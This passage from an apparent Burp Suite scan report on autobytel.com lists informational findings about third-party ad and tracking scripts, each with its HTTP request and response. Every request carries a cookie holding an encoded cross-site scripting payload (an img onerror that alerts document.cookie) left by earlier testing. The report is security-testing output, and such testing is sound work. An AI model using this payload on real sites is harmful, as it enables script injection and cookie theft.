672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47EC3672-DE5D-69C7-48B98AA1600E71B7|||13148|||;sz=160x600;ptile=2;!cat=;ord=31515196?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.529. http://www.autobytel.com/content/home/help/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47E9AB31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=728x90;ptile=1;!cat=;ord=76448835?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47E9AB31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=160x600;ptile=2;!cat=;ord=76448835?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47E9AB31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=1x3;!cat=;ord=76448835?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/home/help/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:15 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:15 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 45239


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
9AB31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=728x90;ptile=1;!cat=;ord=76448835?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47E9AB31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=728x90;ptile=1;!cat=;ord=76448835?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47E9AB31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=1x3;!cat=;ord=76448835?"></script>
...[SNIP]...
B31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=160x600;ptile=2;!cat=;ord=76448835?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47E9AB31-E6D2-0806-5125CDB7A07D8208|||13148|||;sz=160x600;ptile=2;!cat=;ord=76448835?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.530. http://www.autobytel.com/content/home/help/index.cfm/action/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/about

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47BB659F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=728x90;ptile=1;!cat=;ord=71799946?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47BB659F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=160x600;ptile=2;!cat=;ord=71799946?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47BB659F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=1x3;!cat=;ord=71799946?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/home/help/index.cfm/action/about HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:33:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:11 GMT
Content-Length: 32321
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:11 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:11 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
B659F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=728x90;ptile=1;!cat=;ord=71799946?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47BB659F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=728x90;ptile=1;!cat=;ord=71799946?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47BB659F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=1x3;!cat=;ord=71799946?"></script>
...[SNIP]...
59F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=160x600;ptile=2;!cat=;ord=71799946?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47BB659F-D80F-4A1B-D949AB6DC595CD9D|||13148|||;sz=160x600;ptile=2;!cat=;ord=71799946?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.531. http://www.autobytel.com/content/home/help/index.cfm/action/contact

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/contact

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A7BDC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=728x90;ptile=1;!cat=;ord=97281516?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47A7BDC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=160x600;ptile=2;!cat=;ord=97281516?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47A7BDC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=1x3;!cat=;ord=97281516?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/home/help/index.cfm/action/contact HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:31:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:31:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:31:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:31:02 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 36606


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
7BDC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=728x90;ptile=1;!cat=;ord=97281516?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47A7BDC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=728x90;ptile=1;!cat=;ord=97281516?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47A7BDC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=1x3;!cat=;ord=97281516?"></script>
...[SNIP]...
DC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=160x600;ptile=2;!cat=;ord=97281516?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47A7BDC8-F445-0CF6-1BC6705E66910F2D|||13148|||;sz=160x600;ptile=2;!cat=;ord=97281516?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.532. http://www.autobytel.com/content/home/help/index.cfm/action/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/privacy

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47DEC4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=728x90;ptile=1;!cat=;ord=32969344?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47DEC4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=160x600;ptile=2;!cat=;ord=32969344?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47DEC4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=1x3;!cat=;ord=32969344?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/home/help/index.cfm/action/privacy HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 55317
Expires: Mon, 24 Jan 2011 23:37:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:03 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:03 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:03 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
EC4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=728x90;ptile=1;!cat=;ord=32969344?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47DEC4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=728x90;ptile=1;!cat=;ord=32969344?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47DEC4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=1x3;!cat=;ord=32969344?"></script>
...[SNIP]...
4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=160x600;ptile=2;!cat=;ord=32969344?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47DEC4DF-90F8-6B6C-37C390F53BA8DF38|||13148|||;sz=160x600;ptile=2;!cat=;ord=32969344?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.533. http://www.autobytel.com/content/home/help/index.cfm/action/terms

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/help/index.cfm/action/terms

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47C0CFCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=728x90;ptile=1;!cat=;ord=47110988?
  • http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47C0CFCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=160x600;ptile=2;!cat=;ord=47110988?
  • http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47C0CFCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=1x3;!cat=;ord=47110988?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/home/help/index.cfm/action/terms HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:33:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:33:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:33:35 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:33:35 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 54679


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB430 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
0CFCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=728x90;ptile=1;!cat=;ord=47110988?" name="frame1" width="728" height="90" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;dcopt=ist;u=|||47C0CFCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=728x90;ptile=1;!cat=;ord=47110988?"></SCRIPT>
...[SNIP]...
<div>
           <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.research/;kw=;info=13148;u=|||47C0CFCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=1x3;!cat=;ord=47110988?"></script>
...[SNIP]...
FCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=160x600;ptile=2;!cat=;ord=47110988?" name="frame1" width="160" height="600" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
       <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.research/;abr=!ie;kw=;info=13148;u=|||47C0CFCF-FC89-8B8B-E1E5B1FBE3BCB46D|||13148|||;sz=160x600;ptile=2;!cat=;ord=47110988?">
       </SCRIPT>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
<!-- End: Blue Kai -->
       
       
       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no">
</SCRIPT>
...[SNIP]...

21.534. http://www.autobytel.com/content/home/index.cfm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/home/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=597x90;ord=16681240?
  • http://ad.doubleclick.net/adj/abtl.home/lsuv;abr=!ie;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?
  • http://an.tacoda.net/an/17295/slf.js
  • http://js.revsci.net/gateway/gw.js?csid=K04491
  • http://loadus.exelator.com/load/?p=245&g=001&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
  • http://www.bkrtx.com/js/bk-static.js

Request

GET /content/home/index.cfm?id=4;ABTL HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:43 GMT;path=/
Set-Cookie: ID=;expires=Sun, 24-Jan-2010 23:38:43 GMT;path=/
Set-Cookie: ID=4%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 70441


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
nfo=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?" name="frame1" width="369" height="78" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" border="0">
   <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.home/lsuv;abr=!ie;kw=;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=369x78;!cat=;ord=16681240?">
   </script>
...[SNIP]...
ms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=586x90;ord=16681240?" name="frame1" width="586" height="93" frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no">
       <script language="Javascript1.1" SRC="http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;info=4;u=|||47EE0915-DC8E-3C0E-CC4C4D144A76CE6B|||4|||;sz=597x90;ord=16681240?">
       </script>
...[SNIP]...
</iframe>
       
       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...
